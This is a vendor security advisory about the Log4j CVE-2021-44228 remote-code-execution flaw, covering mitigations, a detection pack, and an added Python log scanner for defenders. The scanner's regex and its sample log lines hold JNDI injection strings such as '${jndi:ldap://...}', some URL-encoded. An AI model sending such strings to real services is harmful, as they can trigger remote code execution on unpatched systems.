Threat Hunts must include cloud, network, endpoint, log and email vectors
Note: OpenText™ Security reports that there is no Log4j impact on its EnCase suite of products including EnCase Endpoint Investigator, EnCase Endpoint Security, EnCase Forensic, EnCase Information Assurance, EnCase Mobile Investigator, and Tableau Forensic. See the latest OpenText Security Alert here.
Top US cybersecurity officials have warned of the zero-day vulnerability found in the Java logging library Apache Log4j.
ZDNet reports that the vulnerability, being tracked as CVE-2021-44228, is “severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library.”
It further writes that CERT New Zealand warns that it’s already being exploited in the wild.
Log4j is a popular Java library for logging error messages in applications. This vulnerability lets any remote attacker take control of another device on the internet if it’s running Log4j versions 2.0 to 2.14.1.
“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of CISA said in a call shared with CNN. Easterly has spent 20 years in various federal cybersecurity roles. “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said. The call, with US critical infrastructure owners and operators, was first reported by CyberScoop.
Turn on breach mentality
Given the severity and urgency of the Log4j vulnerability, OpenText Security advises customers to employ a breach mentality and immediately initiate detection and response measures. Any anomaly should be validated against CVE-2021-44228 and appropriate remediation and recovery measures activated.
As a first step to understanding the attack surface, customers of EnCase Endpoint Security can use the “Find Hosts with IOCs” capability to hunt for instances of log4j.jar files across the enterprise.
According to researchers at LunaSec, organizations can identify whether they are affected by examining the log files of any services that use affected Log4j versions. If those logs contain user-controlled strings (CERT-NZ gives the example of “Jndi:ldap”), the service could be affected.
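The log check described above, as an added example written for this post rather than code from OpenText or from LunaSec: a small Python scanner that flags log lines containing a Log4j JNDI lookup string. It generalizes the “Jndi:ldap” example by matching case-insensitively, by also accepting the other JNDI schemes that turn up in logs (ldaps, rmi, dns and a few less common ones; an assumption, not a list from the post), and by URL-decoding each line first, since web-server access logs record request data percent-encoded. The sample log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Case-insensitive match for a JNDI lookup inside a Log4j-style message.
# The post's example is "Jndi:ldap"; the scheme list is an assumption.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:",
    re.IGNORECASE,
)


def normalize(line: str) -> str:
    """Undo percent-encoding that access logs apply to request data,
    so "%24%7Bjndi" is seen as "${jndi". Decoded twice to cover double encoding."""
    return unquote(unquote(line))


def find_jndi_lookups(lines):
    """Return (line_number, scheme, excerpt) for every line holding a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, 1):
        line = normalize(raw)
        match = JNDI_RE.search(line)
        if match:
            start = max(0, match.start() - 20)
            hits.append((number, match.group(1).lower(), line[start:match.end() + 40]))
    return hits


# Constructed sample (not real traffic): an Apache-style access log with a benign
# request, a plain lookup in the User-Agent, a mixed-case one, and a URL-encoded one.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:00:09 +0000] "GET /?x=${Jndi:LDAP://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [11/Dec/2021:10:00:12 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for number, scheme, excerpt in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: jndi scheme={scheme}: ...{excerpt}...")
```

A hit only shows that a lookup string reached the service; whether it was exploited still depends on that service logging the string through a Log4j version in the affected range.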
To mitigate the vulnerability, users should set log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True” to the JVM command used to start the application. To prevent the library from being exploited, it is urgently recommended that Log4j be upgraded to log4j-2.15.0-rc1.
The Log4j vulnerability detection pack is now available for EnCase Endpoint Security.
This detection pack includes filters that will locate the presence of vulnerable versions of Log4j using hashes, as well as searches that detect active and past exploitations based on Indicators of Compromise (IOCs).
Customers and partners can download the detection pack and documentation from the OpenText My Support website here.
Talk to one of our security experts for more information.